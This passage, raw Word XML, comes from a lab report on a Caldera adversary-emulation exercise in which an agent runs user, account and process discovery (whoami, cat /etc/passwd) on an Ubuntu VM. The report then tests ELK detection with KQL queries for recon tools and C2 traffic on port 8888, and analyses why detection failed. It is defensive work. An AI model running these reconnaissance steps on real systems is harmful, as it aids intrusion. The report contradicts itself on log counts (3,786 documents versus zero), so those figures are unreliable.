              <w:left w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="229808B0" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2760" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D921D95" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6E07" w14:paraId="1E62FC0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92D33F" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>12:31:15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BED122" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SUCCESS</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69D681" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>T1033 - Identify active user</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6BB79" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00894116">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6E07" w14:paraId="0808D7A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B9380" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>12:32:01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6721C" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SUCCESS</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54897E" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>T1087 - Find local users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2B8137" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>user list returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6E07" w14:paraId="16CC08B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6C045" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>12:32:46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AE849" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B4513"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>COLLECT</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E34D4" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>T1057 - Find user processes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D69AD" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>collecting...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6E07" w14:paraId="1AB33A7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5FEB6" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>12:33:41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B95D7D" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="006400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SUCCESS</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46849" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>T1057 - Find user processes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1BD98" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>process list returned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68D70E05" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="006A6E07">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D41BC65" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404A78C6" wp14:editId="70B099AD">
            <wp:extent cx="6294355" cy="2703830"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="16" name="Img16"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="16" name="Img16"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6297269" cy="2705082"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE53BB7" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>Figure 6: Operation Chain - TTP Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30D131" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:r>
        <w:t>T1033 success, T1087 success, T1057 collect executed against ubuntu-virtual-machine via agent avuvoq.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D62C6E" w14:textId="77777777" w:rsidR="00894116" w:rsidRDefault="00894116" w:rsidP="00894116">
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28EA29AD" wp14:editId="6CFD6A0F">
            <wp:extent cx="5943600" cy="2857999"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1552553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57999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Caldera Operation Chain of Events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60733374" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="006A6E07">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E89CB86" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43432494" wp14:editId="75330DD7">
            <wp:extent cx="5799206" cy="2790190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Img17"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="17" name="Img17"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5803829" cy="2792414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47519A1D" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>Figure 7: T1033 Output - Identify Active User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20921A7C" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Standard Output: ubuntu. Facts: host.user.name=ubuntu, domain.user.name=ubuntu stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200ED99F" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6832AF78" wp14:editId="3324863B">
            <wp:extent cx="6418354" cy="4192270"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="18" name="Img18"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="18" name="Img18"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6421046" cy="4194028"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF62AE" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>Figure 8: T1087 Output - Find Local Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3996B5" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:r>
        <w:t>All local accounts from /etc/passwd: root, daemon, bin, sys, sync, games, man, lp, mail, news.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557945D" w14:textId="77777777" w:rsidR="00894116" w:rsidRDefault="00894116" w:rsidP="00894116">
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE3A24F" w14:textId="77777777" w:rsidR="00894116" w:rsidRDefault="00894116" w:rsidP="00894116">
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E4A88B" wp14:editId="63A904C0">
            <wp:extent cx="6377078" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="2147141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4650" cy="3104155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Caldera Link Output (T1033 Evidence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D6611B" w14:textId="77777777" w:rsidR="00894116" w:rsidRDefault="00894116">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69580952" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A77B0" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>T1033 (System Owner/User Discovery): whoami executed — returned ubuntu. Fact stored: host.user.name = ubuntu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7E802B" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>T1087 (Account Discovery): cat /etc/passwd executed — local user accounts enumerated successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C07B462" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>T1057 (Process Discovery): process list collected from the victim node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9FE760" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>4. Phase 4 — Detection in ELK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C0433" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 ELK Stack Status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9E674" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Elasticsearch v8.19.15 was running on Debian 13 at 192.168.10.8:9200 (cluster: my-elk, single-node). Kibana was accessible at 192.168.10.8:5601. Filebeat v8.19.1 was installed and running on both the SIEM and victim nodes, configured to ship logs to Elasticsearch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CAC663" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Kibana Discover — KQL Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F297A10" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The following queries were run in Kibana Discover against the filebeat-* data view with time range set to Last 30 minutes and Search entire time range:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C9733" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>process.name : "whoami" or process.name : "id" or process.name : "hostname"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00813BC6" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destination.port : 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DECFE7" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host.name : "ubuntu-virtual-machine"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DABADF" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="006A6E07">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603FB5E1" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5762D6AD" wp14:editId="2619763C">
            <wp:extent cx="6151880" cy="2074533"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="22" name="Img22"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="22" name="Img22"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6165451" cy="2079109"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="073173C6" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>Figure 12: Kibana - 3786 Ubuntu Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F333026" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:r>
        <w:t>KQL host.name: ubuntu-virtual-machine returns 3,786 documents with active timeline in SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CAE4A4" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7986969B" wp14:editId="6B3F3733">
            <wp:extent cx="6083710" cy="2351405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Img23"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="23" name="Img23"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6100746" cy="2357990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B24251" w14:textId="77777777" w:rsidR="008829F9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>Figure 13: Kibana Expanded Log Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF23BF0" w14:textId="0FCB5FBE" w:rsidR="00894116" w:rsidRDefault="00000000" w:rsidP="009A2D5C">
      <w:r>
        <w:t>_index .ds-filebeat-8.19.1, input.type log, agent.type filebeat v8.19.1. Pipeline verified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F25D8C" w14:textId="77777777" w:rsidR="00894116" w:rsidRDefault="00894116">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFBAB43" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Detection Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E5F64B" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>All queries returned zero results. The filebeat-* index contained no documents at the time of the operation (count: 0). The C2 beacon traffic on port 8888 and the process execution events for T1033/T1087 were not captured in ELK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182663A1" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="000000"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>5. Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8DCCD" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB58A0" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Filebeat was configured with type: log reading /var/log/syslog. This input captures generic system messages but does not record individual process creation events. To detect commands like whoami or cat /etc/passwd, a process-level monitoring tool must be installed on the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6313B5C9" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 What Was Missing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0631BAB0" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>auditd with execve syscall rules — captures every process execution with full command line on Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD39D2C" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Sysmon for Linux — provides Event ID 1 (process creation) equivalent telemetry shipped via Filebeat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D417368" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Elastic Endpoint Agent — full EDR telemetry (process, network, file events) without manual auditd config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F52F20" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431DD05E" w14:textId="77777777" w:rsidR="006A6E07" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
